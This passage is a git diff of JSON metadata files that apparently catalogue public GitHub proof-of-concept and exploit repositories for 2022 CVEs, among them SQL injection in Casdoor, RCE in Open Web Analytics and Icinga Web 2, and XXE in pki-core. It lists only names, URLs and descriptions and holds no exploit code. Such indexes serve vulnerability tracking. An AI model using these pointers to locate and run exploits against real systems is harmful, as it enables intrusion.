"web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-24122.json b/2022/CVE-2022-24122.json new file mode 100644 index 0000000000..8982e11c2d --- /dev/null +++ b/2022/CVE-2022-24122.json @@ -0,0 +1,38 @@ +[ + { + "id": 468398052, + "name": "CVE-2022-24122", + "full_name": "meowmeowxw\/CVE-2022-24122", + "owner": { + "login": "meowmeowxw", + "id": 43200867, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/43200867?v=4", + "html_url": "https:\/\/github.com\/meowmeowxw", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/meowmeowxw\/CVE-2022-24122", + "description": "CVE-2022-24122 Proof of Concept", + "fork": false, + "created_at": "2022-03-10T15:20:04Z", + "updated_at": "2022-08-15T15:42:12Z", + "pushed_at": "2022-03-15T11:18:45Z", + "stargazers_count": 12, + "watchers_count": 12, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve", + "cve-2022-24122", + "kernel", + "linux" + ], + "visibility": "public", + "forks": 3, + "watchers": 12, + "score": 0, + "subscribers_count": 4 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-24124.json b/2022/CVE-2022-24124.json index a38368e5fc..3f3ee53efd 100644 --- a/2022/CVE-2022-24124.json +++ b/2022/CVE-2022-24124.json @@ -1,4 +1,40 @@ [ + { + "id": 463446054, + "name": "CVE-2022-24124", + "full_name": "ColdFusionX\/CVE-2022-24124", + "owner": { + "login": "ColdFusionX", + "id": 8522240, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/8522240?v=4", + "html_url": "https:\/\/github.com\/ColdFusionX", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ColdFusionX\/CVE-2022-24124", + "description": "POC for CVE-2022-24124", + "fork": false, + "created_at": "2022-02-25T07:55:55Z", + "updated_at": "2024-11-16T19:52:55Z", + "pushed_at": "2022-03-01T09:44:29Z", + "stargazers_count": 9, + "watchers_count": 9, + "has_discussions": false, + "forks_count": 4, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "casdoor", + "exploit", + "sqli", + "sqlinjection" + ], + "visibility": "public", + "forks": 4, + "watchers": 9, + "score": 0, + "subscribers_count": 1 + }, { "id": 499935826, "name": "CVE-2022-24124", @@ -29,5 +65,41 @@ "watchers": 1, "score": 0, "subscribers_count": 1 + }, + { + "id": 531165610, + "name": "CVE-2022-24124", + "full_name": "b1gdog\/CVE-2022-24124", + "owner": { + "login": "b1gdog", + "id": 81157360, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/81157360?v=4", + "html_url": "https:\/\/github.com\/b1gdog", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/b1gdog\/CVE-2022-24124", + "description": "CVE-2022-24124 exploit", + "fork": false, + "created_at": "2022-08-31T16:23:16Z", + "updated_at": "2024-01-28T01:39:28Z", + "pushed_at": "2023-08-15T22:59:56Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "poc", + "python", + "sqli", + "sqlinjection" + ], + "visibility": "public", + "forks": 2, + "watchers": 2, + "score": 0, + "subscribers_count": 1 } ] \ No newline at end of file diff --git a/2022/CVE-2022-2414.json b/2022/CVE-2022-2414.json new file mode 100644 index 0000000000..d91c146310 --- /dev/null +++ b/2022/CVE-2022-2414.json @@ -0,0 +1,126 @@ +[ + { + "id": 526356142, + "name": "CVE-2022-2414-POC", + "full_name": "superhac\/CVE-2022-2414-POC", + "owner": { + "login": "superhac", + "id": 7942984, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/7942984?v=4", + "html_url": "https:\/\/github.com\/superhac", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/superhac\/CVE-2022-2414-POC", + "description": null, + "fork": false, + "created_at": "2022-08-18T19:58:53Z", + "updated_at": "2022-08-18T21:20:48Z", + "pushed_at": "2022-08-18T20:33:38Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 575000962, + "name": "CVE-2022-2414-Proof-Of-Concept", + "full_name": "amitlttwo\/CVE-2022-2414-Proof-Of-Concept", + "owner": { + "login": "amitlttwo", + "id": 55759090, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/55759090?v=4", + "html_url": "https:\/\/github.com\/amitlttwo", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/amitlttwo\/CVE-2022-2414-Proof-Of-Concept", + "description": "A flaw was found in pki-core. Access to external entities when parsing XML documents can lead to XML external entity (XXE) attacks. This flaw allows a remote attacker to potentially retrieve the content of arbitrary files by sending specially crafted HTTP requests.", + "fork": false, + "created_at": "2022-12-06T14:37:08Z", + "updated_at": "2023-09-21T08:39:16Z", + "pushed_at": "2022-12-06T14:45:04Z", + "stargazers_count": 9, + "watchers_count": 9, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 9, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 700743029, + "name": "CVE-2022-2414", + "full_name": "satyasai1460\/CVE-2022-2414", + "owner": { + "login": "satyasai1460", + "id": 68277833, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/68277833?v=4", + "html_url": "https:\/\/github.com\/satyasai1460", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/satyasai1460\/CVE-2022-2414", + "description": "CVE-2022-2414 POC", + "fork": false, + "created_at": "2023-10-05T07:55:01Z", + "updated_at": "2023-10-05T08:22:24Z", + "pushed_at": "2023-10-05T08:24:52Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 869025784, + "name": "CVE-2022-2414", + "full_name": "geniuszly\/CVE-2022-2414", + "owner": { + "login": "geniuszly", + "id": 137893386, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/137893386?v=4", + "html_url": "https:\/\/github.com\/geniuszly", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/geniuszly\/CVE-2022-2414", + "description": "is a PoC script for demonstrating an XML External Entity (XXE) vulnerability exploitation", + "fork": false, + "created_at": "2024-10-07T15:36:39Z", + "updated_at": "2024-10-21T08:15:06Z", + "pushed_at": "2024-10-07T15:37:27Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 3, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-24227.json b/2022/CVE-2022-24227.json new file mode 100644 index 0000000000..e608f97791 --- /dev/null +++ b/2022/CVE-2022-24227.json @@ -0,0 +1,33 @@ +[ + { + "id": 718130267, + "name": "CVE-2022-24227-updated", + "full_name": "Cyber-Wo0dy\/CVE-2022-24227-updated", + "owner": { + "login": "Cyber-Wo0dy", + "id": 148460873, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/148460873?v=4", + "html_url": "https:\/\/github.com\/Cyber-Wo0dy", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Cyber-Wo0dy\/CVE-2022-24227-updated", + "description": "CVE-2022-24227 [Updated]: BoltWire v8.00 vulnerable to \"Stored Cross-site Scripting (XSS)\"", + "fork": false, + "created_at": "2023-11-13T12:53:56Z", + "updated_at": "2023-11-13T12:56:26Z", + "pushed_at": "2023-11-13T12:54:39Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-24342.json b/2022/CVE-2022-24342.json new file mode 100644 index 0000000000..6b049ad053 --- /dev/null +++ b/2022/CVE-2022-24342.json @@ -0,0 +1,41 @@ +[ + { + "id": 509870464, + "name": "CVE-2022-24342", + "full_name": "yuriisanin\/CVE-2022-24342", + "owner": { + "login": "yuriisanin", + "id": 11749007, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/11749007?v=4", + "html_url": "https:\/\/github.com\/yuriisanin", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/yuriisanin\/CVE-2022-24342", + "description": "PoC for CVE-2022-24342: account takeover via CSRF in GitHub authentication", + "fork": false, + "created_at": "2022-07-02T22:04:29Z", + "updated_at": "2024-08-30T13:59:18Z", + "pushed_at": "2022-07-05T17:31:35Z", + "stargazers_count": 36, + "watchers_count": 36, + "has_discussions": false, + "forks_count": 7, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "csrf", + "cve", + "cve-2022-24342", + "exploit", + "jetbrains", + "teamcity", + "vulnerability" + ], + "visibility": "public", + "forks": 7, + "watchers": 36, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-24439.json b/2022/CVE-2022-24439.json new file mode 100644 index 0000000000..4d0aacf30e --- /dev/null +++ b/2022/CVE-2022-24439.json @@ -0,0 +1,33 @@ +[ + { + "id": 873393552, + "name": "CVE-2022-24439", + "full_name": "muhammadhendro\/CVE-2022-24439", + "owner": { + "login": "muhammadhendro", + "id": 40570379, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/40570379?v=4", + "html_url": "https:\/\/github.com\/muhammadhendro", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/muhammadhendro\/CVE-2022-24439", + "description": null, + "fork": false, + "created_at": "2024-10-16T05:06:01Z", + "updated_at": "2024-10-16T05:07:07Z", + "pushed_at": "2024-10-16T05:07:03Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-24442.json b/2022/CVE-2022-24442.json new file mode 100644 index 0000000000..a196b29937 --- /dev/null +++ b/2022/CVE-2022-24442.json @@ -0,0 +1,43 @@ +[ + { + "id": 739172589, + "name": "CVE-2022-24442", + "full_name": "mbadanoiu\/CVE-2022-24442", + "owner": { + "login": "mbadanoiu", + "id": 18383407, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/18383407?v=4", + "html_url": "https:\/\/github.com\/mbadanoiu", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/mbadanoiu\/CVE-2022-24442", + "description": "CVE-2022-24442: FreeMarker Server-Side Template Injection in JetBrains YouTrack", + "fork": false, + "created_at": "2024-01-05T00:04:41Z", + "updated_at": "2024-01-05T00:24:40Z", + "pushed_at": "2024-01-05T00:21:20Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "0-day", + "authenticated", + "bypass", + "cve", + "cve-2021-25770", + "cve-2022-24442", + "cves", + "remote-code-execution", + "server-side-template-injection" + ], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-24481.json b/2022/CVE-2022-24481.json new file mode 100644 index 0000000000..dfdc1f29c5 --- /dev/null +++ b/2022/CVE-2022-24481.json @@ -0,0 +1,33 @@ +[ + { + "id": 640468590, + "name": "CVE-2022-24481-POC", + "full_name": "fr4nkxixi\/CVE-2022-24481-POC", + "owner": { + "login": "fr4nkxixi", + "id": 81340681, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/81340681?v=4", + "html_url": "https:\/\/github.com\/fr4nkxixi", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/fr4nkxixi\/CVE-2022-24481-POC", + "description": "POC for CLFS CVE-2022-24481", + "fork": false, + "created_at": "2023-05-14T07:30:23Z", + "updated_at": "2024-06-10T17:07:19Z", + "pushed_at": "2023-05-14T08:07:40Z", + "stargazers_count": 12, + "watchers_count": 12, + "has_discussions": false, + "forks_count": 6, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 6, + "watchers": 12, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-24500.json b/2022/CVE-2022-24500.json new file mode 100644 index 0000000000..4a332e4fec --- /dev/null +++ b/2022/CVE-2022-24500.json @@ -0,0 +1,33 @@ +[ + { + "id": 674032505, + "name": "CVE-2022-24500", + "full_name": "0xZipp0\/CVE-2022-24500", + "owner": { + "login": "0xZipp0", + "id": 73413581, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/73413581?v=4", + "html_url": "https:\/\/github.com\/0xZipp0", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/0xZipp0\/CVE-2022-24500", + "description": null, + "fork": false, + "created_at": "2023-08-03T01:55:15Z", + "updated_at": "2023-09-21T09:36:18Z", + "pushed_at": "2023-08-03T01:55:23Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 1, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-24637.json b/2022/CVE-2022-24637.json new file mode 100644 index 0000000000..ba7978c90a --- /dev/null +++ b/2022/CVE-2022-24637.json @@ -0,0 +1,223 @@ +[ + { + "id": 530742974, + "name": "CVE-2022-24637", + "full_name": "JacobEbben\/CVE-2022-24637", + "owner": { + "login": "JacobEbben", + "id": 112503338, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/112503338?v=4", + "html_url": "https:\/\/github.com\/JacobEbben", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/JacobEbben\/CVE-2022-24637", + "description": "Unauthenticated RCE in Open Web Analytics (OWA) <1.7.4", + "fork": false, + "created_at": "2022-08-30T16:38:01Z", + "updated_at": "2023-03-21T17:11:09Z", + "pushed_at": "2023-03-20T14:05:19Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 530761622, + "name": "CVE-2022-24637", + "full_name": "Lay0us\/CVE-2022-24637", + "owner": { + "login": "Lay0us", + "id": 99304369, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/99304369?v=4", + "html_url": "https:\/\/github.com\/Lay0us", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Lay0us\/CVE-2022-24637", + "description": "Unauthenticated RCE in Open Web Analytics (OWA) 1.7.3", + "fork": false, + "created_at": "2022-08-30T17:31:14Z", + "updated_at": "2024-08-12T20:26:38Z", + "pushed_at": "2022-08-30T17:09:40Z", + "stargazers_count": 5, + "watchers_count": 5, + "has_discussions": false, + "forks_count": 5, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 5, + "watchers": 5, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 548059345, + "name": "CVE-2022-24637", + "full_name": "hupe1980\/CVE-2022-24637", + "owner": { + "login": "hupe1980", + "id": 24973437, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/24973437?v=4", + "html_url": "https:\/\/github.com\/hupe1980", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/hupe1980\/CVE-2022-24637", + "description": "Open Web Analytics (OWA) - Unauthenticated Remote Code Execution", + "fork": false, + "created_at": "2022-10-08T21:12:35Z", + "updated_at": "2023-10-19T18:37:03Z", + "pushed_at": "2022-10-12T17:14:54Z", + "stargazers_count": 5, + "watchers_count": 5, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2022-24637", + "openwebanalytics", + "owa" + ], + "visibility": "public", + "forks": 0, + "watchers": 5, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 566546536, + "name": "CVE-2022-24637", + "full_name": "icebreack\/CVE-2022-24637", + "owner": { + "login": "icebreack", + "id": 6855402, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/6855402?v=4", + "html_url": "https:\/\/github.com\/icebreack", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/icebreack\/CVE-2022-24637", + "description": "FIxed exploit for CVE-2022-24637 (original xplt: https:\/\/www.exploit-db.com\/exploits\/51026)", + "fork": false, + "created_at": "2022-11-15T22:39:49Z", + "updated_at": "2024-08-12T20:28:22Z", + "pushed_at": "2022-11-15T22:57:25Z", + "stargazers_count": 4, + "watchers_count": 4, + "has_discussions": false, + "forks_count": 4, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 4, + "watchers": 4, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 611686754, + "name": "CVE-2022-24637", + "full_name": "Pflegusch\/CVE-2022-24637", + "owner": { + "login": "Pflegusch", + "id": 44372539, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/44372539?v=4", + "html_url": "https:\/\/github.com\/Pflegusch", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Pflegusch\/CVE-2022-24637", + "description": "Open Web Analytics 1.7.3 - Remote Code Execution", + "fork": false, + "created_at": "2023-03-09T10:40:24Z", + "updated_at": "2023-10-19T18:37:06Z", + "pushed_at": "2023-04-08T13:58:29Z", + "stargazers_count": 4, + "watchers_count": 4, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 4, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 619163880, + "name": "CVE-2022-24637", + "full_name": "0xM4hm0ud\/CVE-2022-24637", + "owner": { + "login": "0xM4hm0ud", + "id": 80924519, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/80924519?v=4", + "html_url": "https:\/\/github.com\/0xM4hm0ud", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/0xM4hm0ud\/CVE-2022-24637", + "description": "Unauthenticated RCE in Open Web Analytics version <1.7.4", + "fork": false, + "created_at": "2023-03-26T13:11:50Z", + "updated_at": "2024-08-29T19:41:23Z", + "pushed_at": "2023-03-26T13:22:14Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 3, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 681731098, + "name": "CVE-2022-24637", + "full_name": "0xRyuk\/CVE-2022-24637", + "owner": { + "login": "0xRyuk", + "id": 64897374, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/64897374?v=4", + "html_url": "https:\/\/github.com\/0xRyuk", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/0xRyuk\/CVE-2022-24637", + "description": "Open Web Analytics 1.7.3 - Remote Code Execution Exploit v2", + "fork": false, + "created_at": "2023-08-22T16:25:52Z", + "updated_at": "2023-09-10T11:09:48Z", + "pushed_at": "2023-08-22T16:43:55Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-24654.json b/2022/CVE-2022-24654.json new file mode 100644 index 0000000000..f8f9722e3b --- /dev/null +++ b/2022/CVE-2022-24654.json @@ -0,0 +1,33 @@ +[ + { + "id": 523767651, + "name": "CVE-2022-24654", + "full_name": "leonardobg\/CVE-2022-24654", + "owner": { + "login": "leonardobg", + "id": 13241258, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/13241258?v=4", + "html_url": "https:\/\/github.com\/leonardobg", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/leonardobg\/CVE-2022-24654", + "description": "PoC for CVE-2022-24654", + "fork": false, + "created_at": "2022-08-11T15:06:49Z", + "updated_at": "2022-08-13T19:03:20Z", + "pushed_at": "2022-08-11T15:09:47Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-2466.json b/2022/CVE-2022-2466.json new file mode 100644 index 0000000000..188ce4fb45 --- /dev/null +++ b/2022/CVE-2022-2466.json @@ -0,0 +1,33 @@ +[ + { + "id": 518001622, + "name": "CVE-2022-2466---Request-Context-not-terminated-with-GraphQL", + "full_name": "yuxblank\/CVE-2022-2466---Request-Context-not-terminated-with-GraphQL", + "owner": { + "login": "yuxblank", + "id": 12859195, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/12859195?v=4", + "html_url": "https:\/\/github.com\/yuxblank", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/yuxblank\/CVE-2022-2466---Request-Context-not-terminated-with-GraphQL", + "description": null, + "fork": false, + "created_at": "2022-07-26T09:45:46Z", + "updated_at": "2022-10-16T16:12:37Z", + "pushed_at": "2022-07-26T10:56:31Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-24702.json b/2022/CVE-2022-24702.json new file mode 100644 index 0000000000..1ae59bc6a0 --- /dev/null +++ b/2022/CVE-2022-24702.json @@ -0,0 +1,36 @@ +[ + { + "id": 463266133, + "name": "WinAPRS-Exploits", + "full_name": "Coalfire-Research\/WinAPRS-Exploits", + "owner": { + "login": "Coalfire-Research", + "id": 35154327, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/35154327?v=4", + "html_url": "https:\/\/github.com\/Coalfire-Research", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Coalfire-Research\/WinAPRS-Exploits", + "description": "A collection of exploits, shellcode, and tools related to CVE-2022-24702", + "fork": false, + "created_at": "2022-02-24T18:53:01Z", + "updated_at": "2022-06-02T01:15:45Z", + "pushed_at": "2022-04-01T17:07:44Z", + "stargazers_count": 8, + "watchers_count": 8, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "shell", + "wordpress" + ], + "visibility": "public", + "forks": 2, + "watchers": 8, + "score": 0, + "subscribers_count": 6 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-24706.json b/2022/CVE-2022-24706.json index d6125a3a93..1e673f2eff 100644 --- a/2022/CVE-2022-24706.json +++ b/2022/CVE-2022-24706.json @@ -60,5 +60,36 @@ "watchers": 1, "score": 0, "subscribers_count": 1 + }, + { + "id": 510182546, + "name": "CVE-2022-24706", + "full_name": "superzerosec\/CVE-2022-24706", + "owner": { + "login": "superzerosec", + "id": 57648217, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/57648217?v=4", + "html_url": "https:\/\/github.com\/superzerosec", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/superzerosec\/CVE-2022-24706", + "description": "CVE-2022-24706 POC exploit", + "fork": false, + "created_at": "2022-07-04T02:06:27Z", + "updated_at": "2022-07-04T02:06:27Z", + "pushed_at": "2022-07-04T02:06:28Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 2 } ] \ No newline at end of file diff --git a/2022/CVE-2022-24715.json b/2022/CVE-2022-24715.json new file mode 100644 index 0000000000..ec0d87ee7e --- /dev/null +++ b/2022/CVE-2022-24715.json @@ -0,0 +1,95 @@ +[ + { + "id": 616284623, + "name": "CVE-2022-24715", + "full_name": "JacobEbben\/CVE-2022-24715", + "owner": { + "login": "JacobEbben", + "id": 112503338, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/112503338?v=4", + "html_url": "https:\/\/github.com\/JacobEbben", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/JacobEbben\/CVE-2022-24715", + "description": " Authenticated Remote Code Execution in Icinga Web 2 <2.8.6, <2.9.6, <2.10", + "fork": false, + "created_at": "2023-03-20T04:31:32Z", + "updated_at": "2023-07-17T19:37:21Z", + "pushed_at": "2023-04-27T08:43:59Z", + "stargazers_count": 16, + "watchers_count": 16, + "has_discussions": false, + "forks_count": 5, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 5, + "watchers": 16, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 664102574, + "name": "CVE-2022-24715", + "full_name": "cxdxnt\/CVE-2022-24715", + "owner": { + "login": "cxdxnt", + "id": 79928273, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/79928273?v=4", + "html_url": "https:\/\/github.com\/cxdxnt", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/cxdxnt\/CVE-2022-24715", + "description": "Icinga Web 2 - Authenticated Remote Code Execution <2.8.6, <2.9.6, <2.10", + "fork": false, + "created_at": "2023-07-08T23:22:28Z", + "updated_at": "2023-07-09T13:33:46Z", + "pushed_at": "2023-07-09T13:44:36Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 715006168, + "name": "CVE-2022-24715-go", + "full_name": "d4rkb0n3\/CVE-2022-24715-go", + "owner": { + "login": "d4rkb0n3", + "id": 149922113, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/149922113?v=4", + "html_url": "https:\/\/github.com\/d4rkb0n3", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/d4rkb0n3\/CVE-2022-24715-go", + "description": null, + "fork": false, + "created_at": "2023-11-06T09:44:33Z", + "updated_at": "2023-11-06T09:47:13Z", + "pushed_at": "2023-11-06T09:49:09Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-24716.json b/2022/CVE-2022-24716.json new file mode 100644 index 0000000000..0b93c4b791 --- /dev/null +++ b/2022/CVE-2022-24716.json @@ -0,0 +1,157 @@ +[ + { + "id": 616179873, + "name": "CVE-2022-24716", + "full_name": "JacobEbben\/CVE-2022-24716", + "owner": { + "login": "JacobEbben", + "id": 112503338, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/112503338?v=4", + "html_url": "https:\/\/github.com\/JacobEbben", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/JacobEbben\/CVE-2022-24716", + "description": "Arbitrary File Disclosure Vulnerability in Icinga Web 2 <2.8.6, <2.9.6, <2.10", + "fork": false, + "created_at": "2023-03-19T20:41:46Z", + "updated_at": "2023-12-07T14:08:19Z", + "pushed_at": "2023-03-27T22:46:04Z", + "stargazers_count": 14, + "watchers_count": 14, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 3, + "watchers": 14, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 616253439, + "name": "CVE-2022-24716", + "full_name": "joaoviictorti\/CVE-2022-24716", + "owner": { + "login": "joaoviictorti", + "id": 85838827, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/85838827?v=4", + "html_url": "https:\/\/github.com\/joaoviictorti", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/joaoviictorti\/CVE-2022-24716", + "description": "CVE-2022-24716 (Arbitrary File Disclosure Icingaweb2)", + "fork": false, + "created_at": "2023-03-20T02:25:55Z", + "updated_at": "2023-10-07T20:28:35Z", + "pushed_at": "2023-10-11T13:27:10Z", + "stargazers_count": 5, + "watchers_count": 5, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 5, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 619003382, + "name": "CVE-2022-24716", + "full_name": "pumpkinpiteam\/CVE-2022-24716", + "owner": { + "login": 